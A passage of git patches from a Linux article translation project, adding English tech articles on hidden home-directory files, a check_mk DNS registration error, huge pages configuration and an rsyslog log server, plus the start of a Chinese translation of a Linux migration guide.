--- /dev/null
+++ b/sources/tech/20171017 What Are the Hidden Files in my Linux Home Directory For.md
@@ -0,0 +1,61 @@
+What Are the Hidden Files in my Linux Home Directory For?
+======
+
+![](https://www.maketecheasier.com/assets/uploads/2017/06/hidden-files-linux-hero.png)
+
+In your Linux system you probably store a lot of files and folders in your Home directory. But beneath those files, do you know that your Home directory also comes with a lot of hidden files and folders? If you run `ls -a` on your home directory, you'll discover a pile of hidden files and directories with dot prefixes. What do these hidden files do anyway?
+
+### What are hidden files in the home directory for?
+
+![hidden-files-liunux-2][1]
+
+Most commonly, hidden files and directories in the home directory contain settings or data that's accessed by that user's programs. They're not intended to be edited by the user, only the application. That's why they're hidden from the user's normal view.
+
+In general files from your own home directory can be removed and changed without damaging the operating system. The applications that rely on those hidden files, however, might not be as flexible. When you remove a hidden file from the home directory, you'll typically lose the settings for the application associated with it.
+
+The program that relied on that hidden file will typically recreate it. However, you'll be starting from the "out-of-the-box" settings, like a brand new user. If you're having trouble with an application, that can actually be a huge help. It lets you remove customizations that might be causing trouble. But if you're not, it just means you'll need to set everything back the way you like it.
+
+
+### What are some specific uses of hidden files in the home directory?
+![hidden-files-linux-3][2]
+
+Everyone will have different hidden files in their home directory. There are some that everyone has. However, the files serve a similar purpose, regardless of the parent application.
+
+### System Settings
+
+System settings include the configuration for your desktop environment and your shell.
+
+ * **Configuration files** for your shell and command line utilities: Depending on the specific shell and command-like utilities you use, the specific file name will change. You 'll see files like ".bashrc," ".vimrc" and ".zshrc." These files contain any settings you've changed about your shell's operating environment or tweaks you've made to the settings of command-line utilities like `vim`. Removing these files will return the associated application to its default state. Considering many Linux users build up an array of subtle tweaks and settings over the years, removing this file could be a huge headache.
+ * **User profiles:** Like the configuration files above, these files (typically ".profile" or ".bash_profile") save user settings for the shell. This file often contains your PATH. It also contains [aliases][3] you've set. Users can also put aliases in `.bashrc` or other locations. The PATH governs where the shell looks for executable commands. By appending or modifying your PATH, you can change where your shell looks for commands. Aliases change the names of commands. One alias might set `ll` to call `ls -l`, for example. This provides text-based shortcuts to often-used commands. If you delete `.profile`, you can often find the default version in the "/etc/skel" directory.
+ * **Desktop environment settings:** This saves any customization of your desktop environment. That includes the desktop background, screensavers, shortcut keys, menu bar and taskbar icons, and anything else that the user has set about their desktop environment. When you remove this file, the user's environment reverts to the new user environment at the next login.
+
+
+
+### Application configuration files
+
+You'll find these in the ".config" folder in Ubuntu. These are settings for your specific applications. They'll include things like the preference lists and settings.
+
+ * **Configuration files for applications** : This includes settings from the application preferences menu, workspace configurations and more. Exactly what you'll find here depends on the parent application.
+ * **Web browser data:** This may include things like bookmarks and browsing history. The majority of files make up the cache. This is where the web browser stores temporarily download files, like images. Removing this might slow down some media-heavy websites the first time you visit them.
+ * **Caches** : If a user application caches data that's only relevant to that user (like the [Spotify app storing cache of your playlist][4]), the home directory is a natural place to store it. These caches might contain masses of data or just a few lines of code: it depends on what the parent application needs. If you remove these files, the application recreates them as necessary.
+ * **Logs:** Some user applications might store logs here as well. Depending on how developers set up the application, you might find log files stored in your home directory. This isn't a common choice, however.
+
+
+### Conclusion
+In most cases the hidden files in your Linux home directory as used to store user settings. This includes settings for command-line utilities as well as GUI-based applications. Removing them will remove user settings. Typically, it won't cause a program to break.
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/hidden-files-linux-home-directory/
+
+作者:[Alexander Fox][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/alexfox/
+[1]:https://www.maketecheasier.com/assets/uploads/2017/06/hidden-files-liunux-2.png (hidden-files-liunux-2)
+[2]:https://www.maketecheasier.com/assets/uploads/2017/06/hidden-files-linux-3.png (hidden-files-linux-3)
+[3]:https://www.maketecheasier.com/making-the-linux-command-line-a-little-friendlier/#aliases
+[4]:https://www.maketecheasier.com/clear-spotify-cache/
From 2368163b40f4e3d09cdc6a8e01248e4347849ff1 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:08:57 +0800
Subject: [PATCH 023/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20check=5Fmk=20erro?=
=?UTF-8?q?r=20Cannot=20fetch=20deployment=20URL=20via=20curl=20error?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...not fetch deployment URL via curl error.md | 62 +++++++++++++++++++
1 file changed, 62 insertions(+)
create mode 100644 sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
diff --git a/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md b/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
new file mode 100644
index 0000000000..245d424f1b
--- /dev/null
+++ b/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
@@ -0,0 +1,62 @@
+translating by lujun9972
+check_mk error Cannot fetch deployment URL via curl error
+======
+Article explaining 'ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.' and how to resolve it.
+
+![ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.][1]
+
+check_mk is a utility which helps you configure your server to be monitored via [nagios monitoring tool][2]. While configuring one of the client I came across below error :
+
+`ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.`
+
+This error came after I tried to register client with monitoring server with below command :
+
+```
+root@kerneltalks# /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
+```
+
+Here in this command -
+
+`-s` is monitoring server
+`-i` is Name of Check_MK site on that server
+`-H` is Host name to fetch agent for
+`-p` is protocol Either http or https (default is https)
+`-U` User-ID of a user who is allowed to download the agent.
+`-S` is secret. Automation secret of that user (in case of automation user)
+From error you can figure out that command is not able to resolve monitoring server DNS name `monitor.kerneltalks.com`
+
+### Solution :
+
+Its pretty simple. Check `/etc/resolv.conf` to make sure that you have proper DNS server entry for your environment. If it still dosnt resolve issue then you can add entry in [/etc/hosts][3] for it.
+
+```
+root@kerneltalks# cat /etc/hosts
+10.0.10.9 monitor.kerneltalks.com
+```
+
+Thats it. You would be able to register now successfully.
+
+```
+root@kerneltalks # /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
+Going to register agent at deployment server
+Successfully registered agent for deployment.
+You can now update your agent by running 'cmk-update-agent -v'
+Saved your registration settings to /etc/cmk-update-agent.state.
+```
+
+By the way you can directly use IP address for `-s` switch and get rid of all above jargon including error itself!
+
+--------------------------------------------------------------------------------
+
+via: https://kerneltalks.com/troubleshooting/check_mk-register-cannot-fetch-deployment-url-via-curl-error/
+
+作者:[kerneltalks][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://kerneltalks.com
+[1]:https://c4.kerneltalks.com/wp-content/uploads/2017/10/resolve-check_mk-error.png
+[2]:https://www.nagios.org/
+[3]:https://kerneltalks.com/linux/understanding-etc-hosts-file/
From 1fa2f9fb39f65e6d3da4ab2c80d4ddb74097d3f9 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:28:14 +0800
Subject: [PATCH 024/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20is=20huge?=
=?UTF-8?q?=20pages=20in=20Linux=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20171102 What is huge pages in Linux.md | 138 ++++++++++++++++++
1 file changed, 138 insertions(+)
create mode 100644 sources/tech/20171102 What is huge pages in Linux.md
diff --git a/sources/tech/20171102 What is huge pages in Linux.md b/sources/tech/20171102 What is huge pages in Linux.md
new file mode 100644
index 0000000000..448280643f
--- /dev/null
+++ b/sources/tech/20171102 What is huge pages in Linux.md
@@ -0,0 +1,138 @@
+translating by lujun9972
+What is huge pages in Linux?
+======
+Learn about huge pages in Linux. Understand what is hugepages, how to configure it, how to check current state and how to disable it.
+
+![Huge Pages in Linux][1]
+
+In this article, we will walk you though details about huge pages so that you will be able to answer : what is huge pages in Linux? How to enable/disable huge pages? How to determine huge page value? in Linux like RHEL6, RHEL7, Ubuntu etc.
+
+Lets start with Huge pages basics.
+
+### What is Huge page in Linux?
+
+Huge pages are helpful in virtual memory management in Linux system. As name suggests, they help is managing huge size pages in memory in addition to standard 4KB page size. You can define as huge as 1GB page size using huge pages.
+
+During system boot, you reserve your memory portion with huge pages for your application. This memory portion i.e. these memory occupied by huge pages is never swapped out of memory. It will stick there until you change your configuration. This increases application performance to great extent like Oracle database with pretty large memory requirement.
+
+### Why use huge page?
+
+In virtual memory management, kernel maintains table in which it has mapping of virtual memory address to physical address. For every page transaction, kernel needs to load related mapping. If you have small size pages then you need to load more numbers of pages resulting kernel to load more mapping tables. This decreases performance.
+
+Using huge pages, means you will need fewer pages. This decreases number of mapping tables to load by kernel to great extent. This increases your kernel level performance which ultimately benefits your application.
+
+In short, by enabling huge pages, system has fewer page tables to deal with and hence less overhead to access / maintain them!
+
+### How to configure huge pages?
+
+Run below command to check current huge pages details.
+
+```
+root@kerneltalks # grep Huge /proc/meminfo
+AnonHugePages: 0 kB
+HugePages_Total: 0
+HugePages_Free: 0
+HugePages_Rsvd: 0
+HugePages_Surp: 0
+Hugepagesize: 2048 kB
+```
+
+In above output you can see one page size is 2MB `Hugepagesize` and total of 0 pages on system `HugePages_Total`. This huge page size can be increased from 2MB to max 1GB.
+
+Run below script to get how much huge pages your system needs currently . Script is from Oracle and can be found.
+
+```
+#!/bin/bash
+#
+# hugepages_settings.sh
+#
+# Linux bash script to compute values for the
+# recommended HugePages/HugeTLB configuration
+#
+# Note: This script does calculation for all shared memory
+# segments available when the script is run, no matter it
+# is an Oracle RDBMS shared memory segment or not.
+# Check for the kernel version
+KERN=`uname -r | awk -F. '{ printf("%d.%d\n",$1,$2); }'`
+# Find out the HugePage size
+HPG_SZ=`grep Hugepagesize /proc/meminfo | awk {'print $2'}`
+# Start from 1 pages to be on the safe side and guarantee 1 free HugePage
+NUM_PG=1
+# Cumulative number of pages required to handle the running shared memory segments
+for SEG_BYTES in `ipcs -m | awk {'print $5'} | grep "[0-9][0-9]*"`
+do
+ MIN_PG=`echo "$SEG_BYTES/($HPG_SZ*1024)" | bc -q`
+ if [ $MIN_PG -gt 0 ]; then
+ NUM_PG=`echo "$NUM_PG+$MIN_PG+1" | bc -q`
+ fi
+done
+# Finish with results
+case $KERN in
+ '2.4') HUGETLB_POOL=`echo "$NUM_PG*$HPG_SZ/1024" | bc -q`;
+ echo "Recommended setting: vm.hugetlb_pool = $HUGETLB_POOL" ;;
+ '2.6' | '3.8' | '3.10' | '4.1' ) echo "Recommended setting: vm.nr_hugepages = $NUM_PG" ;;
+ *) echo "Unrecognized kernel version $KERN. Exiting." ;;
+esac
+# End
+```
+You can save it in `/tmp` as `hugepages_settings.sh` and then run it like below :
+```
+root@kerneltalks # sh /tmp/hugepages_settings.sh
+Recommended setting: vm.nr_hugepages = 124
+```
+
+Output will be similar to some number as shown in above sample output.
+
+This means your system needs 124 huge pages of 2MB each! If you have set 4MB as page size then output would have been 62. You got the point, right?
+
+### Configure hugepages in kernel
+
+Now last part is to configure above stated [kernel parameter][2] and reload it. Add below value in `/etc/sysctl.conf` and reload configuration by issuing `sysctl -p` command.
+
+```
+vm .nr_hugepages=126
+```
+
+Notice that we added 2 extra pages in kernel since we want to keep couple of pages spare than actual required number.
+
+Now, huge pages has been configured in kernel but to allow your application to use them you need to increase memory limits as well. New memory limit should be 126 pages x 2 MB each = 252 MB i.e. 258048 KB.
+
+You need to edit below settings in `/etc/security/limits.conf`
+
+```
+soft memlock 258048
+hard memlock 258048
+```
+
+Sometimes these settings are configured in app specific files like for Oracle DB its in `/etc/security/limits.d/99-grid-oracle-limits.conf`
+
+Thats it! You might want to restart your application to make use of these new huge pages.
+
+### How to disable hugepages?
+
+HugePages are generally enabled by default. Use below command to check current state of hugepages.
+
+```
+root@kerneltalks# cat /sys/kernel/mm/transparent_hugepage/enabled
+[always] madvise never
+```
+
+`[always]` flag in output shows that hugepages are enabled on system.
+
+For RedHat base systems file path is `/sys/kernel/mm/redhat_transparent_hugepage/enabled`
+
+If you want to disable huge pages then add `transparent_hugepage=never` at the end of `kernel` line in `/etc/grub.conf` and reboot the system.
+
+--------------------------------------------------------------------------------
+
+via: https://kerneltalks.com/services/what-is-huge-pages-in-linux/
+
+作者:[Shrikant Lavhate][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://kerneltalks.com
+[1]:https://c1.kerneltalks.com/wp-content/uploads/2017/11/hugepages-in-linux.png
+[2]:https://kerneltalks.com/linux/how-to-tune-kernel-parameters-in-linux/
From e72e315e79732347156075946e4023050410cdca Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:29:44 +0800
Subject: [PATCH 025/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Install=20a=20Cen?=
=?UTF-8?q?tralized=20Log=20Server=20with=20Rsyslog=20in=20Debian=209?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...zed Log Server with Rsyslog in Debian 9.md | 225 ++++++++++++++++++
1 file changed, 225 insertions(+)
create mode 100644 sources/tech/20171018 Install a Centralized Log Server with Rsyslog in Debian 9.md
diff --git a/sources/tech/20171018 Install a Centralized Log Server with Rsyslog in Debian 9.md b/sources/tech/20171018 Install a Centralized Log Server with Rsyslog in Debian 9.md
new file mode 100644
index 0000000000..4971d97023
--- /dev/null
+++ b/sources/tech/20171018 Install a Centralized Log Server with Rsyslog in Debian 9.md
@@ -0,0 +1,225 @@
+Install a Centralized Log Server with Rsyslog in Debian 9
+======
+
+In Linux, the log files are files that contain messages about the system functions which are used by system administrators to identify eventual issues on the machines. The logs help administrators to visualize the events that happened in the system over time periods. Usually, all log files are kept under **/var/log** directory in Linux. In this location, there are several types of log files for storing various messages, such as a log file for recording system events, a log file for security related messages, other log files dedicated for kernel, users or cron jobs. The main purpose of log files is to troubleshoot system problems. Most log files in Linux are controlled by rsyslogd service. On newer releases of Linux distributions, the log files are also controlled and managed by the journald system service, which is a part of systemd initialization program. The logs stored by journal daemon are written in a binary format and are mainly volatile, stored in RAM and in a ring-buffer in /run/log/journal/. However, the journal service can be also configured to permanently store the Syslog messages.
+
+In Linux, the rsyslog server can be configured to run a central log manager, in a service-client model fashion, and send log messages over the network via TCP or UDP transport protocols or receive logs from network devices, servers, routers, switches or other systems or embedded devices that generate logs.
+
+Rsyslog daemon can be setup to run as a client and server at the same time. Configured to run as a server, Rsyslog will listen on default port 514 TCP and UDP and will start to collect log messages that are sent over the network by remote systems. As client, Rsyslog will send over the network the internal log messages to a remote Ryslog server via the same TCP or UDP ports.
+
+Rsyslog will filter syslog messages according to selected properties and actions. The rsyslog filters are as follows:
+
+ 1. Facility or Priority filers
+ 2. Property-based filters
+ 3. Expression-based filters
+
+
+
+The **facility** filter is represented by the Linux internal subsystem that produces the logs. They are categorized as presented below:
+
+ * **auth/authpriv** = messages produced by authentication processes
+ * **cron** = logs related to cron tasks
+ * **daemon** = messages related to running system services
+ * **kernel** = Linux kernel messages
+ * **mail** = mail server messages
+ * **syslog** = messages related to syslog or other daemons (DHCP server sends logs here)
+ * **lpr** = printers or print server messages
+ * **local0 - local7** = custom messages under administrator control
+
+
+
+The **priority or severity** levels are assigned to a keyword and a number as described below.
+
+ * **emerg** = Emergency - 0
+ * **alert** = Alerts - 1
+ * **err** = Errors - 3
+ * **warn** = Warnings - 4
+ * **notice** = Notification - 5
+ * **info** = Information - 6
+ * **debug** = Debugging - 7 highest level
+
+
+
+There are also some special Rsyslog keywords available such as the asterisk ( ***** ) sign to define all
+facilities or priorities, the **none** keyword which specify no priorities, the equal sign ( **=** ) which selects only that priority and the exclamation sign ( **!** ) which negates a priority.
+
+The action part of the syslog is represented by the **destination** statement. The destination of a log message can be a file stored in the file system, a file in /var/log/ system path, another local process input via a named pipe or FIFO. The log messages can be also directed to users, discarded to a black hole (/dev/null) or sent to stdout or to a remote syslog server via TCP/UDP protocol. The log messages can be also stored in a database, such as MySQL or PostgreSQL.
+
+### Configure Rsyslog as a Server
+
+The Rsyslog daemon is automatically installed in most Linux distributions. However, if Rsyslog is not installed on your system you can issue one of the below commands in order to install the service> you will require root privileges to run the commands.
+
+In Debian based distros:
+
+sudo apt-get install rsyslog
+
+In RHEL based distros like CentOS:
+
+sudo yum install rsyslog
+
+In order to verify if Rsyslog daemon is started on a system execute the below commands, depending on your distribution version.
+
+On newer Linux distros with systemd:
+
+systemctl status rsyslog.service
+
+On older Linux versions with init:
+
+service rsyslog status
+
+/etc/init.d/rsyslog status
+
+In order to start the rsyslog daemon issue the following command.
+
+On older Linux versions with init:
+
+service rsyslog start
+
+/etc/init.d/rsyslog start
+
+On latest Linux distros:
+
+systemctl start rsyslog.service
+
+To setup an rsyslog program to run in server mode, edit the main configuration file in **/etc/rsyslog.conf.** In this file make the following changes as shown in the below sample.
+
+sudo vi /etc/rsyslog.conf
+
+Locate and uncomment by removing the hashtag (#) the following lines in order to allow UDP log message reception on 514 port. By default, the UDP port is used by syslog to send-receive messages.
+```
+$ModLoad imudp
+$UDPServerRun 514
+```
+
+Because the UDP protocol is not reliable to exchange data over a network, you can setup Rsyslog to output log messages to a remote server via TCP protocol. To enable TCP reception protocol, open **/etc/rsyslog.conf** file and uncomment the following lines as shown below. This will allow the rsyslog daemon to bind and listen on a TCP socket on port 514.
+```
+$ModLoad imtcp
+ $InputTCPServerRun 514 ****
+```
+
+Both protocols can be enabled in rsyslog to run at the same time.
+
+If you want to specify to which senders you permit access to rsyslog daemon, add the following line after the enabled protocol lines:
+```
+$AllowedSender TCP, 127.0.0.1, 10.110.50.0/24, *.yourdomain.com
+```
+
+You will also need to create a new template that will be parsed by rsyslog daemon before receiving the incoming logs. The template should instruct the local Rsyslog server where to store the incoming log messages. Define the template right after the **$AllowedSender** line as shown in the below sample.
+```
+$template Incoming-logs,"/var/log/%HOSTNAME%/%PROGRAMNAME%.log"
+*.* ?Incoming-logs
+& ~
+```
+
+**** To log only the messages generated by kern facility use the below syntax.
+```
+kern.* ?Incoming-logs
+```
+
+The received logs are parsed by the above template and will be stored in the local file system in /var/log/ directory, in files named after the client hostname client facility that produced the messages: %HOSTNAME% and %PROGRAMNAME% variables.
+
+The below **& ~** redirect rule configures the Rsyslog daemon to save the incoming log messages only to the above files specified by the variables names. Otherwise, the received logs will be further processed and also stored in the content of local logs, such as /var/log/syslog file.
+
+To add a rule to discard all related log messages to mail, you can use the following statement.
+```
+mail.* ~
+```
+
+Other variables that can be used to output file names are: %syslogseverity%, %syslogfacility%, %timegenerated%, %HOSTNAME%, %syslogtag%, %msg%, %FROMHOST-IP%, %PRI%, %MSGID%, %APP-NAME%, %TIMESTAMP%, %$year%, %$month%, %$day%
+
+Starting with Rsyslog version 7, a new configuration format can be used to declare a template in an Rsyslog server.
+
+A version 7 template sample can look like shown in the below lines.
+```
+template(name="MyTemplate" type="string"
+ string="/var/log/%FROMHOST-IP%/%PROGRAMNAME:::secpath-replace%.log"
+ )
+```
+
+**** Another mode you can write the above template can also be as shown below:
+```
+template(name="MyTemplate" type="list") {
+ constant(value="/var/log/")
+ property(name="fromhost-ip")
+ constant(value="/")
+ property(name="programname" SecurePath="replace")
+ constant(value=".log")
+ } **
+**
+```
+
+In order to apply any changes made to rsyslog configuration file, you must restart the daemon to load the new configuration.
+
+sudo service rsyslog restart
+
+sudo systemctl restart rsyslog
+
+To check which rsyslog sockets in listening state are opened on a Debian Linux system, you can execute the **netstat** command with root privileges. Pass the results via a filter utility, such as **grep**.
+
+sudo netstat -tulpn | grep rsyslog
+
+Be aware that you must also open Rsyslog ports in firewall in order to allow incoming connections to be established.
+
+In RHEL based distros with Firewalld activated issue the below commands:
+
+firewall-cmd --permanent --add-port=514/tcp
+
+firewall-cmd --permanent --add-port=514/tcp
+
+firewall-cmd -reload
+
+In Debian based distros with UFW firewall active issue the below commands:
+
+ufw allow 514/tcp
+
+ufw allow 514/udp
+
+Iptables firewall rules:
+
+iptables -A INPUT -p tcp -m tcp --dport 514 -j ACCEPT
+
+iptables -A INPUT -p udp --dport 514 -j ACCEPT
+
+### Configure Rsyslog as a Client
+
+To enable rsyslog daemon to run in client mode and output local log messages to a remote Rsyslog server, edit **/etc/rsyslog.conf** file and add one of the following lines:
+
+*. * @IP_REMOTE_RSYSLOG_SERVER:514
+
+*. * @FQDN_RSYSLOG_SERVER:514
+
+This line enables the Rsyslog service to output all internal logs to a distant Rsyslog server on UDP port 514.
+
+To send the logs over TCP protocol use the following template:
+```
+*. * @@IP_reomte_syslog_server:514
+```
+
+To output only cron related logs with all priorities to a rsyslog server, use the below template:
+```
+cron.* @ IP_reomte_syslog_server:514
+```
+
+In cases when the Rsyslog server is not reachable via network, append the below lines to /etc/rsyslog.conf file on the client side in order temporarily store the logs in a disk buffered file, until the server comes online.
+```
+$ActionQueueFileName queue
+$ActionQueueMaxDiskSpace 1g
+$ActionQueueSaveOnShutdown on
+$ActionQueueType LinkedList
+$ActionResumeRetryCount -1
+```
+
+To apply the above rules, Rsyslog daemon needs to be restarted in order to act as a client.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/rsyslog-centralized-log-server-in-debian-9/
+
+作者:[Matt Vas][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
From 2ea3092d2e3a702e7a55606532b96961c9a9e4f0 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Fri, 5 Jan 2018 22:31:44 +0800
Subject: [PATCH 026/371] Translated by stevenzdg988
---
...031 Migrating to Linux- An Introduction.md | 83 -------------------
1 file changed, 83 deletions(-)
delete mode 100644 sources/tech/20171031 Migrating to Linux- An Introduction.md
diff --git a/sources/tech/20171031 Migrating to Linux- An Introduction.md b/sources/tech/20171031 Migrating to Linux- An Introduction.md
deleted file mode 100644
index 513a8cd721..0000000000
--- a/sources/tech/20171031 Migrating to Linux- An Introduction.md
+++ /dev/null
@@ -1,83 +0,0 @@
-stevenzdg988 translating!!
-
-Migrating to Linux: An Introduction
-======
-![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/migrating-to-linux.jpg?itok=sjcGK0SY)
-Computer systems running Linux are everywhere. Linux runs our Internet services, from Google search to Facebook, and more. Linux also runs in a lot of devices, including our smartphones, televisions, and even cars. Of course, Linux can also run on your desktop system. If you are new to Linux, or you would just like to try something different on your desktop computer, this series of guides will briefly cover the basics and help you in migrating to Linux from another system.
-
-Switching to a different operating system can be a challenge because every operating system provides a different way of doing things. What is second nature on one system can take frustrating time on another as we need to look up how to do things online or in books.
-
-### Vive la difference
-
-To getting started with Linux, one thing you'll likely notice is that Linux is packaged differently. In other operating systems, many things are bundled together and are just a part of the package. In Linux, however, each component is called out separately. For example, under Windows, the graphical interface is just a part of Windows. With Linux, you can choose from multiple graphical environments, like GNOME, KDE Plasma, Cinnamon, and MATE, to name a few.
-
-At a high level, a Linux installation includes the following things:
-
- 1. The kernel
-
- 2. System programs and files residing on disk
-
- 3. A graphical environment
-
- 4. A package manager
-
- 5. Applications
-
-
-
-
-### The Kernel
-
-The core of the operating system is called the kernel. The kernel is the engine under the hood. It allows multiple applications to run simultaneously, and it coordinates their access to common services and devices so everything runs smoothly.
-
-### System programs and files
-
-System programs reside on disk in a standard hierarchy of files and directories. These system programs and files include services (called daemons) that run in the background, utilities for various operations, configuration files, and log files.
-
-Instead of running inside the kernel, these system programs are applications that perform tasks for basic system operation -- for example, set the date and time and connect on the network so you can get on the Internet.
-
-Included here is the init program - the very first application that runs. This program is responsible to starting all the background services (like a web server), starting networking, and starting the graphical environment. This init program will launch other system programs as needed.
-
-Other system programs provide facilities for simple tasks like adding users and groups, changing your password, and configuring disks.
-
-### Graphical Environment
-
-The graphical environment is really just more system programs and files. The graphical environment provides the usual windows with menus, a mouse pointer, dialog boxes, status and indicators and more.
-
-Note that you aren't stuck with the graphical environment that was originally installed. You can change it out for others, if you like. Each graphical environment will have different features. Some look more like Apple OS X, some look more like Windows, and others are unique and don't try to mimic other graphical interfaces.
-
-### Package Manager
-
-The package manager used to be difficult for people to grasp coming from a different system, but nowadays there is a similar system that people are very familiar with -- the App Store. The packaging system is really an app store for Linux. Instead of installing this application from that web site, and the other application from a different site, you can use the package manager to select which applications you want. The package manager then installs the applications from a central repository of pre-built open source applications.
-
-### Applications
-
-Linux comes with many pre-installed applications. And you can get more from the package manager. Many of the applications are quite good, which others need work. Sometimes the same application will have different versions that run in Windows or Mac OS or Linux.
-
-For example, you can use Firefox browser and Thunderbird (for email). You can use LibreOffice as an alternative to Microsoft Office and run games through Valve's Steam program. You can even run some native Windows applications on Linux using WINE.
-
-### Installing Linux
-
-Your first step is typically to install a Linux distribution. You may have heard of Red Hat, Ubuntu, Fedora, Arch Linux, and SUSE, to name a few. These are different distributions of Linux.
-
-Without a Linux distribution, you would have to install each component separately. Many components are developed and provided by different groups of people, so to install each component separately would be a long, tedious task. Luckily, the people who build distros do this work for you. They grab all the components, build them, make sure they work together, and then package them up under a single installation.
-
-Various distributions may make different choices and use different components, but it's still Linux. Applications written to work in one distribution frequently run on other distributions just fine.
-
-If you are a Linux beginner and want to try out Linux, I recommend[ installing Ubuntu][1]. There are other distros you can look into as well: Linux Mint, Fedora, Debian, Zorin OS, elementary OS, and many more. In future articles, we will cover additional facets of a Linux system and provide more information on how to get started using Linux.
-
-Learn more about Linux through the free ["Introduction to Linux" ][2]course from The Linux Foundation and edX.
-
---------------------------------------------------------------------------------
-
-via: https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
-
-作者:[John Bonesio][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linux.com/users/johnbonesio
-[1]:https://www.ubuntu.com/download/desktop
-[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From a4fc4b8523151aa9537f3c01fe60f618e47bd020 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Fri, 5 Jan 2018 22:32:22 +0800
Subject: [PATCH 027/371] Translated by stevenzdg988
---
...031 Migrating to Linux- An Introduction.md | 64 +++++++++++++++++++
1 file changed, 64 insertions(+)
create mode 100644 translated/tech/20171031 Migrating to Linux- An Introduction.md
diff --git a/translated/tech/20171031 Migrating to Linux- An Introduction.md b/translated/tech/20171031 Migrating to Linux- An Introduction.md
new file mode 100644
index 0000000000..6128c5ccd0
--- /dev/null
+++ b/translated/tech/20171031 Migrating to Linux- An Introduction.md
@@ -0,0 +1,64 @@
+
+迁移到 Linux :入门介绍
+======
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/migrating-to-linux.jpg?itok=sjcGK0SY)
+运行 Linux 的计算机系统到遍布每个角落。Linux 运行我们的互联网服务,从谷歌搜索到“脸书” ```(Facebook)```,等等。Linux 也在很多设备上运行,包括我们的智能手机、电视,甚至汽车。当然,Linux 也可以运行在您的桌面系统上。如果您是 Linux 新手,或者您想在您的桌面计算机上尝试一些不同的东西,这篇文章将简要地介绍其基础知识,并帮助您从另一个系统迁移到 Linux。
+
+切换到不同的操作系统可能是一个挑战,因为每个操作系统都提供了不同的操作方法。其在一个系统上的第二特性可能会阻碍其在另一个系统正常使用,因此我们需要到网上或书本上查找怎样操作。
+### Windows 与 Linux 的区别 ```来自于法语(万岁的区别)--来自于 wiktionary ```
+
+要开始使用 Linux,您可能会注意到,Linux 的打包方式不同。在其他操作系统中,许多组件被捆绑在一起,只是包的一部分。然而,在 Linux 中,每个组件都被分别调用。举个例子来说,在 Windows 下,图形界面只是操作系统的一部分。而在 Linux 下,您可以从多个图形环境中进行选择,比如 GNOME、KDE Plasma、Cinnamon 和 MATE 等。
+At a high level, a Linux installation includes the following things:
+在高级别上,Linux安装包括以下内容:
+ 1. 内核
+ 2. 系统程序和文件驻留在磁盘上
+ 3. 图形环境
+ 4. 包管理器
+ 5. 应用程序
+
+
+
+### 内核
+
+操作系统的核心称为内核。内核是引擎罩下的引擎。它允许多个应用程序同时运行,并协调它们对公共服务和设备的访问,从而使所有设备运行顺畅。
+### 系统程序和文件(系统)
+
+系统程序位于文件和目录的标准层次结构中的磁盘上。这些系统程序和文件包括后台运行的服务(称为守护进程)、各种操作的实用程序、配置文件和日志文件。
+
+这些系统程序不是在内核中运行,而是执行基本系统操作的应用程序——例如,设置日期和时间,并在网络上连接,这样你就可以上网了。
+
+这里包含了初始化(init)程序——最新运行应用程序。该程序负责启动所有后台服务(如WEB服务器)、启动网络链接和启动图形环境。这个初始化(init)程序将根据需要启动其他系统程序。
+
+其他系统程序为简单的任务提供便利,比如添加用户和组、更改密码和配置磁盘。
+### 图形环境
+
